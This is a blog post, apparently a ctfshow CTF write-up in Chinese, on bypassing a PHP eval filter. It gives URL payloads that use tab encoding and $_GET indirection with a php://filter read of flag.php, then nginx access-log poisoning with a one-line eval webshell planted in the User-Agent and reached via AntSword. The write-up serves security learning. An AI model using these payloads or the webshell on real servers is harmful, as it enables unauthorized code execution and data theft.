<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Untitled | l-y-fのblog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="要求GET传参传入参数c 正则匹配过滤了flag system php cat sort shell 点号、空格、单引号、双引号、反引号、分号和左括号构造payload:&#x2F;?c&#x3D;include%09&quot;&#x2F;fla*&quot;?&gt;因为左括号被禁用 所以尝试文件包含 避开括号 语法include 文件名;因为空格被禁用 所以用tab键的url编码 %09因为分号被禁用 所以用 ?&gt;">
<meta property="og:type" content="article">
<meta property="og:title" content="Untitled">
<meta property="og:url" content="https://l-y-f-f1111.github.io/2026/07/26/2026-07-26-Untitled/index.html">
<meta property="og:site_name" content="l-y-fのblog">
<meta property="og:description" content="要求GET传参传入参数c 正则匹配过滤了flag system php cat sort shell 点号、空格、单引号、双引号、反引号、分号和左括号构造payload:&#x2F;?c&#x3D;include%09&quot;&#x2F;fla*&quot;?&gt;因为左括号被禁用 所以尝试文件包含 避开括号 语法include 文件名;因为空格被禁用 所以用tab键的url编码 %09因为分号被禁用 所以用 ?&gt;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260726104237.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260726102936.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260726111411.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260726104818.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260726173239.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260726173937.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260726173916.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260726173903.png">
<meta property="og:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260726172437.png">
<meta property="article:published_time" content="2026-07-26T00:00:00.000Z">
<meta property="article:modified_time" content="2026-08-12T08:46:58.174Z">
<meta property="article:author" content="l-y-f">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://l-y-f-f1111.github.io/images/Pastedimage20260726104237.png">
  
    <link rel="alternate" href="/atom.xml" title="l-y-fのblog" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/fork-awesome@1.2.0/css/fork-awesome.min.css">

<meta name="generator" content="Hexo 7.1.1"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">l-y-fのblog</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS 订阅"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="搜索"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="搜索"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://l-y-f-f1111.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-2026-07-26-Untitled" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2026/07/26/2026-07-26-Untitled/" class="article-date">
  <time class="dt-published" datetime="2026-07-26T00:00:00.000Z" itemprop="datePublished">2026-07-26</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      Untitled
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p><img src="/images/Pastedimage20260726104237.png"><br>要求GET传参传入参数c 正则匹配过滤了flag system php cat sort shell 点号、空格、单引号、双引号、反引号、分号和左括号<br>构造payload:<code>/?c=include%09&quot;/fla*&quot;?&gt;</code><br>因为左括号被禁用 所以尝试文件包含 避开括号 语法include 文件名;<br>因为空格被禁用 所以用tab键的url编码 %09<br>因为分号被禁用 所以用 <code>?&gt;</code>来结束当前的PHP语句<br><img src="/images/Pastedimage20260726102936.png"><br>但是行不通 问题出在通配符 include是PHP的语言结构 不是Shell命令 即PHP的文件操作函数不支持通配符 它们只接受具体的文件路径</p>
<h3 id="方法1"><a href="#方法1" class="headerlink" title="方法1"></a>方法1</h3><p>使用文件包含的同时加上php伪协议<br><code>/?c=include%09$_GET[0]?&gt;&amp;0=php://filter/convert.base64-encode/resource=flag.php</code><br><code>$_GET</code> 是一个数组，内容是URL 中所有GET参数组成的键值对<br><code>[0]</code> 表示键名为 <code>0</code> 的数组元素<br><strong>注意:<code>$_GET</code>是关联数组  所以<code>[0]</code>只是键名为<code>0</code>的元素，与位置无关，区别于索引数组</strong><br>并且数字键名不需要引号 整体实现了获取URL中参数 <code>0</code> 的值 避免使用引号<br><code>?&gt;</code>PHP结束标签<br><code>&amp;</code> 分隔多个GET参数 即<code>c</code>和<code>0</code><br><code>0=</code> 定义参数名为 <code>0</code> 对应PHP中的 <code>$_GET[0]</code></p>
<p><code>php://filter/convert.base64-encode/resource=</code>这是PHP伪协议 读取文件内容并以Base64编码输出<br>拆解:<br><code>php://</code>PHP 内置的伪协议<br><code>filter</code>表示使用过滤器功能<br><code>/convert.base64-encode</code>过滤器名称 作用：把文件内容转换为 Base64 编码<br><code>/resource=</code>指定要处理的文件路径</p>
<p>整体执行逻辑：<br>1.PHP将URL中的参数解析成 <code>$_GET</code> 数组<br>    <code>$_GET[&#39;c&#39;]</code> &#x3D; <code>&#39;include%09$_GET[0]?&gt;&#39;</code><br>    <code>$_GET[0]</code> &#x3D; <code>&#39;php://filter/convert.base64-encode/resource=flag.php&#39;</code><br> 2.<code>eval()</code> 执行 <code>c</code> 参数的内容<br>     <code>eval(&#39;include%09$_GET[0]?&gt;&#39;);</code><br>3.<code>$_GET[0]</code> 被替换成 flag.php   <code>include &#39;flag.php&#39;;  4.执行</code>include ‘flag.php’;&#96;<br><img src="/images/Pastedimage20260726111411.png">解码得到flag<br><img src="/images/Pastedimage20260726104818.png"><br>这是已知flag位置的前提下 可以使用这个方法</p>
<h3 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h3><p>如果在不知道flag的位置的前提下 需要使用文件包含+日志注入的方式<br>判断是否能日志注入：尝试包含日志文件看是否能读取内容<br>首先抓包看看 得到服务器为nginx<br><img src="/images/Pastedimage20260726173239.png"><br><code>/var/log/nginx/access.log</code>是<code>nginx</code>默认的access日志路径<br>所以和上一个payload的大体格式一样构造，只是将静态的读取文件变成了动态的包含日志，执行其中的PHP代码<br><code>/?c=include%09$_GET[0]?&gt;&amp;0=/var/log/nginx/access.log</code><br><img src="/images/Pastedimage20260726173937.png"><br>这个payload的执行过程如下：<br>1.PHP将URL中的参数解析成 <code>$_GET</code> 数组<br>    <code>$_GET[&#39;c&#39;] = &#39;include%09$_GET[0]?&gt;&#39;;     </code>$_GET[0] &#x3D; ‘&#x2F;var&#x2F;log&#x2F;nginx&#x2F;access.log’;<br> 2.<code>eval()</code> 执行 <code>c</code> 参数的内容<br>     <code>eval(&#39;include%09$_GET[0]?&gt;&#39;);</code><br>3.<code>$_GET[0]</code> 被替换成 &#x2F;var&#x2F;log&#x2F;nginx&#x2F;access.log   <code>include &#39;/var/log/nginx/access.log&#39;;</code><br>4.执行<code>include &#39;/var/log/nginx/access.log&#39;;</code><br>整个过程纯文本输出，没有任何PHP代码被执行<br>返回包里面包含了所有的攻击尝试记录 说明<code>include</code> 成功执行 日志文件被包含</p>
<p>下一步修改UA把一句话木马存进服务器的日志文件里，然后通过包含日志文件来执行代码<br>一句话木马<code>&lt;?php @eval($_POST[&#39;cmd&#39;]); ?&gt;</code><br>写一句话木马的作用:<br>凡是从POST参数里传入 <code>cmd</code> ，都把它当成PHP代码执行，然后把结果返回<br>选择修改UA的原因：<br>1.Nginx默认记录每个请求的UA到访问日志<br>2.UA内容完全可控<br>3.UA内容不会被过滤<br><img src="/images/Pastedimage20260726173916.png"><br>写入后用蚁剑连接(蚁剑自动化、图形化、批量化地完成POST传参过程)<br>注意：HTTPS可能有证书验证问题或端口限制 所以一开始用https连接失败 改成http才可以<br><img src="/images/Pastedimage20260726173903.png"><br>得到flag<br><img src="/images/Pastedimage20260726172437.png"></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://l-y-f-f1111.github.io/2026/07/26/2026-07-26-Untitled/" data-id="cmsvpzk4j00035wuy895f6b8h" data-title="Untitled" class="article-share-link"><span class="fa fa-share">分享</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2026/08/04/2026-08-04-ctfshow%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Cweb33/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">前一篇</strong>
      <div class="article-nav-title">
        
          ctfshow 命令执行web33
        
      </div>
    </a>
  
  
    <a href="/2026/07/25/2026-07-25-ctfshow%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Cweb29/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">后一篇</strong>
      <div class="article-nav-title">ctfshow 命令执行web29</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2026/08/">八月 2026</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2026/07/">七月 2026</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2026/08/16/2026-08-16-ctfshow%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Cweb69/">ctfshow 命令执行web69</a>
          </li>
        
          <li>
            <a href="/2026/08/15/2026-08-15-ctfshow%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Cweb67/">ctfshow 命令执行web67</a>
          </li>
        
          <li>
            <a href="/2026/08/14/2026-08-14-ctfshow%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Cweb58/">ctfshow 命令执行web58</a>
          </li>
        
          <li>
            <a href="/2026/08/13/2026-08-13-ctfshow%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8Cweb54/">ctfshow 命令执行web54</a>
          </li>
        
          <li>
            <a href="/2026/08/12/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2026 l-y-f<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>